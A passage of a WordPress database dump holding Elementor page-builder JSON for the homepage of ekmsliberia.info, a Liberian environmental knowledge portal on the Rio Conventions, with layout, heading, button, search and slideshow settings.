c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"<p>Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?<\\/p>\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(26975,3927,'_elementor_version','2.7.5'),(26976,3927,'_elementor_template_type','wp-page'),(26977,3927,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(26978,3928,'_wp_page_template','default'),(26979,3928,'_elementor_edit_mode','builder'),(26980,3928,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"t